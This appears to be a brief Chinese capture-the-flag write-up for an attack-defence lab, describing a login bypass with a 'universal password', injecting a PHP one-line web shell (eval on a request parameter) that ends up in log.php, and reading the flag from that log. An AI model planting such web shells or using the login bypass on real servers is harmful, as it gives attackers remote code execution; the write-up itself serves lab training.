AWD-Test2

1.已知账号密码,可SSH连接进行代码审计。

2.登录可万能密码 进入,也可注册 后登录。

3.修改url参数,发现报错。确定为Linux系统

4.写入一句话,并提交。(也可以文件上传,这里采用简洁的方法)

复制代码
<?php phpinfo();?>   //写入这个,在日志log.php可查看flag
<?php eval($_REQUEST[123]);?>

5.访问log.php日志文件,发现里面有flag

复制代码
http://efbc89f9-f04d-4204-b60b-65777640d4ef.node5.buuoj.cn:81/log.php

flag{399aa672-cf2d-4aca-9bec-693be96a9083}

注:如果没有,可以在前面一句话处填写 <?php phpinfo();?> 并提交。

相关推荐
数据库小学妹13 分钟前
MySQL安全加固全流程:网络隔离、TDE加密、数据脱敏、等保合规7步实战
mysql·安全·数据脱敏·审计日志·安全加固·等保合规
申君健248641827720218 分钟前
Vapor 核心数据结构:Block原理
前端
Csvn27 分钟前
工程化专题 | 改完组件保存,浏览器毫无反应,重启 dev server 又好了——气不气?
前端
我有满天星辰1 小时前
Vue 指令完全指南:从 Vue 2 到 Vue 3 的演进与实战
前端·javascript·vue.js
光影少年1 小时前
RN 渲染原理:不依赖WebView,原生控件渲染
前端·react native·react.js·前端框架
小白学过的代码1 小时前
# flv.js / mpegts.js 播不了国标摄像头(H.265 + G.711A)?纯前端 Jessibuca 无后端方案(附完整代码)
前端·javascript·h.265
console.log('npc')1 小时前
AI Agent 前端流式渲染核心技术文档(SSE \+ WebSocket \+ 打字机渲染)
前端·人工智能·websocket
法外狂徒11 小时前
将 Pi Agent 接入 HagiCode 的实践之路
服务器·前端·人工智能
IT_陈寒1 小时前
React中useEffect的依赖项把我坑惨了
前端·人工智能·后端
BullSmall1 小时前
新手做 Fuzz 测试全套注意事项(从零入门避坑版)
安全性测试